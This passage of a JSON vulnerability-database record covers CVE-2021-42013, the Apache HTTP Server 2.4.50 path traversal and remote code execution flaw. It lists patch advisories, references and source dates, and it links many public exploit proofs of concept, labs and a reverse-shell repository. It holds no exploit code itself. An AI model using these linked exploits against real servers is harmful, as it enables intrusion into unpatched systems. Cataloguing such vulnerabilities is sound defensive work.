        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "id": "VAR-202110-1690",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      }
    ]
  },
  "last_update_date": "2024-01-17T19:11:09.746000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "hitachi-sec-2023-217",
        "trust": 0.8,
        "url": "https://downloads.apache.org/httpd/changes_2.4.51"
      },
      {
        "title": "Patch for Apache HTTP Server Directory Traversal Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/313141"
      },
      {
        "title": "Apache HTTP Server Repair measures for path traversal vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=165084"
      },
      {
        "title": "Apache 2.4.50 - Path Traversal or Remote Code Execution\nVulnerable Configurations in httpd.conf\nLab for CVE-2021-42013\nUsage cve-2021-42013.py",
        "trust": 0.2,
        "url": "https://github.com/walnutsecurity/cve-2021-42013 "
      },
      {
        "title": "Red Hat: CVE-2021-42013",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-42013"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202110-1] apache: directory traversal",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202110-1"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-42013 log"
      },
      {
        "title": "Cisco: Apache HTTP Server Vulnerabilties: October 2021",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-apache-httpd-pathtrv-lazg68cz"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2021-1543",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1543"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1716",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1716"
      },
      {
        "title": "Apache 2.4.50 - Path Traversal or Remote Code Execution\nVulnerable Configurations in httpd.conf\nLab for CVE-2021-42013\nUsage cve-2021-42013.py",
        "trust": 0.1,
        "url": "https://github.com/mightysai1997/cve-2021-42013.get "
      },
      {
        "title": "Usage cve-2021-42013.py",
        "trust": 0.1,
        "url": "https://github.com/imhunterand/cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/viliuspovilaika/cve-2021-42013 "
      },
      {
        "title": "Apache 2.4.50 - Path Traversal or Remote Code Execution\nVulnerable Configurations in httpd.conf\nLab for CVE-2021-42013\nUsage cve-2021-42013.py",
        "trust": 0.1,
        "url": "https://github.com/mightysai1997/cve-2021-42013 "
      },
      {
        "title": "Lab for CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/turzum/ps-lab-cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013 Vulnerable service",
        "trust": 0.1,
        "url": "https://github.com/12345qwert123456/cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013 - Apache HTTP Server 2.4.50\nCara Menjalankan Lab CVE-2021-42013-Path Traversal\nCara Menjalankan Lab CVE-2021-42013-RCE",
        "trust": 0.1,
        "url": "https://github.com/bincangsiber/cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013-LAB",
        "trust": 0.1,
        "url": "https://github.com/jas9reet/cve-2021-42013-lab "
      },
      {
        "title": "CVE-2021-42013 - Apache HTTP Server 2.4.50\nCara Menjalankan Lab CVE-2021-42013-Path Traversal\nCara Menjalankan Lab CVE-2021-42013-RCE",
        "trust": 0.1,
        "url": "https://github.com/layarkacasiber/cve-2021-42013 "
      },
      {
        "title": "Advent-of-Cyber-3-2021-",
        "trust": 0.1,
        "url": "https://github.com/ibrahimetecicek/advent-of-cyber-3-2021- "
      },
      {
        "title": "CVE-2021-42013-ApacheRCE",
        "trust": 0.1,
        "url": "https://github.com/xmohamed0/cve-2021-42013-apacherce "
      },
      {
        "title": "Dockerisation d\u0027une Vuln\u00e9rabilit\u00e9 : cve-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/cybfar/cve-2021-42013-httpd "
      },
      {
        "title": "CVE-2021-42013\nApache 2.4.50 vulnerability",
        "trust": 0.1,
        "url": "https://github.com/hamesawian/cve-2021-42013 "
      },
      {
        "title": "cve-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/mightysai1997/cve-2021-42013l "
      },
      {
        "title": "cve-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/vulnmachines/cve-2021-42013 "
      },
      {
        "title": "Read Me",
        "trust": 0.1,
        "url": "https://github.com/mallaichte/efed-management-system "
      },
      {
        "title": "Container-Security (Docker \u0026 Kubernetes)",
        "trust": 0.1,
        "url": "https://github.com/vamckis/container-security "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/theykillmeslowly/cve-2021-42013 "
      },
      {
        "title": "Project Title",
        "trust": 0.1,
        "url": "https://github.com/mightysai1997/-apache_2.4.50 "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/cryst4lliz3/cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013_Reverse-Shell",
        "trust": 0.1,
        "url": "https://github.com/thelastvvv/cve-2021-42013_reverse-shell "
      },
      {
        "title": "Apache HTTP Server 2.4.50 LFI \u0026 RCE",
        "trust": 0.1,
        "url": "https://github.com/hadrian3689/apache_2.4.50 "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/thelastvvv/cve-2021-42013 "
      },
      {
        "title": "Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\nCredits: Ash Daulton \u0026 cPanel Security Team\nDate: 24/07/2021\nExploit Author: TheLastVvV.com\nVendor Homepage:  https://apache.org/\nVersion: Apache 2.4.50 with CGI enable\nTested on : Debian 5.10.28\nCVE : CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/luke-cmd/sharecode "
      },
      {
        "title": "comp.sec.300.2021.2022",
        "trust": 0.1,
        "url": "https://github.com/codinglikejesus/comp.sec.300.2021.2022 "
      },
      {
        "title": "apache-exploit-CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/andrea-mattioli/apache-exploit-cve-2021-42013 "
      },
      {
        "title": "https://github.com/ralvares/security-demos",
        "trust": 0.1,
        "url": "https://github.com/ralvares/security-demos "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/rnsss/cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/khidhir-ibrahim/cve-2021-42013 "
      },
      {
        "title": "cve-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/rubikcuv5/cve-2021-42013 "
      },
      {
        "title": "CVE-2021-42013",
        "trust": 0.1,
        "url": "https://github.com/twseptian/cve-2021-42013-docker-lab "
      },
      {
        "title": "https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP",
        "trust": 0.1,
        "url": "https://github.com/asaotomo/cve-2021-42013-apache-rce-poc-exp "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [IPA evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/164501/apache-http-server-2.4.50-path-traversal-code-execution.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/165089/apache-http-server-2.4.50-cve-2021-42013-exploitation.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/167397/apache-2.4.50-remote-code-execution.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/164941/apache-http-server-2.4.50-remote-code-execution.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/164629/apache-2.4.49-2.4.50-traversal-remote-code-execution.html"
      },
      {
        "trust": 2.2,
        "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
      },
      {
        "trust": 1.7,
        "url": "https://security.gentoo.org/glsa/202208-20"
      },
      {
        "trust": 1.6,
        "url": "https://httpd.apache.org/security/vulnerabilities_24.html"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20211029-0009/"
      },
      {
        "trust": 1.6,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/16/1"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/15/3"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/164609/apache-http-server-2.4.50-remote-code-execution.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/08/4"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/08/3"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/08/2"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/09/1"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/08/1"
      },
      {
        "trust": 1.6,
        "url": "https://www.povilaika.com/apache-2-4-50-exploit/"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/08/6"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/07/6"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/08/5"
      },
      {
        "trust": 1.6,
        "url": "http://jvn.jp/en/jp/jvn51106450/index.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2021/10/11/4"
      },
      {
        "trust": 1.2,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3%40%3ccvs.httpd.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837%40%3cannounce.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb%40%3cusers.httpd.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/"
      },
      {
        "trust": 1.0,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-httpd-pathtrv-lazg68cz"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-42013"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/jp/jvn51106450/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.ipa.go.jp/security/ciadr/vul/alert20211006.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.jpcert.or.jp/at/2021/at210043.html"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837@%3cannounce.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "httpd.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3@%3ccvs."
      },
      {
        "trust": 0.6,
        "url": "https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb@%3cusers."
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/"
      },
      {
        "trust": 0.6,
        "url": "httpd.apache.org/security/vulnerabilities_24.html"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-42013"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2021100131"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021100718"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50406"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3348"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50446"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50512"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022042513"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021101513"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/apache-http-server-2-4-49-50-directory-traversal-via-alias-like-directives-36614"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021100802"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2021110108"
      },
      {
        "trust": 0.6,
        "url": "httpd-pathtrv-lazg68cz"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168072/gentoo-linux-security-advisory-202208-20.html"
      },
      {
        "trust": 0.1,
        "url": "https://lsass.io"
      },
      {
        "trust": 0.1,
        "url": "https://apache.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-29404"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44790"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-41773"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-41524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44224"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22719"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-40438"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30556"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-36160"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-34798"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39275"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22720"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33193"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "PACKETSTORM",
        "id": "165089"
      },
      {
        "db": "PACKETSTORM",
        "id": "164501"
      },
      {
        "db": "PACKETSTORM",
        "id": "168072"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "db": "PACKETSTORM",
        "id": "165089"
      },
      {
        "db": "PACKETSTORM",
        "id": "164501"
      },
      {
        "db": "PACKETSTORM",
        "id": "168072"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-01-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "date": "2021-10-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "date": "2021-10-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "date": "2021-11-29T18:03:21",
        "db": "PACKETSTORM",
        "id": "165089"
      },
      {
        "date": "2021-10-13T15:03:24",
        "db": "PACKETSTORM",
        "id": "164501"
      },
      {
        "date": "2022-08-15T16:02:48",
        "db": "PACKETSTORM",
        "id": "168072"
      },
      {
        "date": "2021-10-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      },
      {
        "date": "2021-10-07T16:15:09.270000",
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-01-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2022-03220"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-42013"
      },
      {
        "date": "2023-12-12T07:40:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      },
      {
        "date": "2022-08-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      },
      {
        "date": "2023-11-07T03:39:05.670000",
        "db": "NVD",
        "id": "CVE-2021-42013"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165089"
      },
      {
        "db": "PACKETSTORM",
        "id": "168072"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apache\u00a0HTTP\u00a0Server\u00a0 directory traversal vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-000090"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202110-413"
      }
    ],
    "trust": 0.6
  }
}

